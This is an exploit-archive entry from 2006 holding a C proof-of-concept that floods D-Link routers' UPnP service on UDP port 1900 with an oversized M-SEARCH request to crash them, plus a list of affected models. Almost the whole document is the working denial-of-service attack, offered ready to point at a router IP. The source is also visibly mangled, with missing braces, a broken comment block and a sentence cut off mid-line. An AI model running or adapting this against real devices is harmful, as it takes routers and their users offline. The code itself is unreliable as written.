D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)

ID SSV:16302
Type seebug
Reporter Root
Modified 2006-07-22T00:00:00


No description provided by source.

                                                /* routers affected from eEye's advisory. /str0ke
Routers Affected:
DI-524 Rev A
DI-524 Rev C
DI-524 Rev D
DI-604 Rev E
DI-624 Rev C
DI-624 Rev D
DI-784 Rev A
EBR-2310 Rev A
WBR-1310 Rev A
WBR-2310 Rev A

 * D-Link Router UPNP DOS PoC
 * Written By: ub3rst4r aka DiGiTALST*R
 * Tested Against: DI-524 Rev. A
 * A remote stack overflow exists in a range of wired and wireless D-Link 
 * routers. This vulnerability allows an attacker to execute privileged code
 * on an affected device. Although a stack overflow does exist, debugging this 
 * vulnerabilty requires additional external hardware.
 * NOTE: You might need to try sending this twice, or use
 * Credits: eEye Digital Security

#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

int main(int argc, char **argv)
    WSADATA wsa;

    char buf[896];
    int sockfd;
    struct sockaddr_in serv_addr;

    int ret;
    if (argc < 2) {
        printf("Usage: dlinkdos <router ip>\n");
        return 0;
    WSAStartup(MAKEWORD(1,1), &wsa);

    // the main string
    memcpy(buf, "M-SEARCH ", 9);
    memset(buf+9, 'A', 800);
    memcpy(buf+809, " HTTP/1.1\r\n", 10);
    // extra data

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1900);
    serv_addr.sin_addr.s_addr = inet_addr(argv[1]);
    memset(&serv_addr.sin_zero, '\0', 8);
    ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr));
    if (ret <= 0) {
        printf("failed to send request\n");
        return 0;
    printf("request sent!\n");
    return 0;

// milw0rm.com [2006-07-22]